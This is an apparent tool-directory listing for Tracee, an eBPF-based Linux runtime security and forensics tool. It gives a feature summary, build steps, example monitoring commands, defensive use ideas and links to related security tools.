tracee
by aquasecurity
Tracee is a Linux runtime security and forensics tool that leverages eBPF to detect and analyze suspicious system behavior in real-time.
Linux Runtime Security and Forensics using eBPF
Primary Use Case
Tracee is primarily used by security professionals and system administrators to monitor Linux endpoints for malicious activity and perform forensic investigations. It provides deep visibility into system calls and kernel events to detect intrusions and anomalous behavior without impacting system performance.
- Real-time tracing of Linux kernel events using eBPF
- Detection of suspicious behavior and intrusion attempts
- Forensic analysis capabilities for post-incident investigations
- Lightweight and efficient with minimal performance overhead
- CLI-based tool for easy integration into security workflows
- Support for custom detection rules and event filtering
- Open-source with active community support
Installation
- Ensure Linux kernel version supports eBPF (4.14+ recommended)
- Install dependencies: clang, llvm, libelf-dev, gcc
- Clone the repository: git clone https://github.com/aquasecurity/tracee.git
- Navigate to the tracee directory: cd tracee
- Build the tool using make: make
- Run Tracee with appropriate permissions (usually as root)
Usage
>_ ./tracee-ebpfStart Tracee to monitor kernel events in real-time with default settings
>_ ./tracee-ebpf --helpDisplay help information and available command line options
>_ ./tracee-ebpf --trace processTrace only process-related events
>_ ./tracee-ebpf --output jsonOutput events in JSON format for easier parsing and integration
>_ ./tracee-ebpf --filter 'event=execve'Filter events to show only execve system calls
- Integrate Tracee with SIEM platforms for enriched alerting and correlation.
- Leverage custom eBPF rules to tailor detection to specific threat models or environments.
- Use Tracee in purple team exercises to validate detection capabilities against red team tactics.
- Deploy Tracee in CI/CD pipelines to catch anomalous behavior during application runtime testing.
- Combine Tracee outputs with automated response tools to enable faster incident containment.
Docs Take 2 Hours. AI Takes 10 Seconds.
Ask anything about tracee. Installation? Config? Troubleshooting? Get answers trained on real docs and GitHub issues—not generic ChatGPT fluff.
3 free chats per tool • Instant responses • No credit card
Related Tools
rustdesk
rustdesk/rustdesk
An open-source remote desktop application designed for self-hosting, as an alternative to TeamViewer.
osquery
osquery/osquery
SQL powered operating system instrumentation, monitoring, and analytics.
macOS-Security-and-Privacy-Guide
drduh/macOS-Security-and-Privacy-Guide
Community guide to securing and improving privacy on macOS.
How-To-Secure-A-Linux-Server
imthenachoman/How-To-Secure-A-Linux-Server
An evolving how-to guide for securing a Linux server.
Atlas
Atlas-OS/Atlas
🚀 An open and lightweight modification to Windows, designed to optimize performance, privacy and usability.
fail2ban
fail2ban/fail2ban
Daemon to ban hosts that cause multiple authentication errors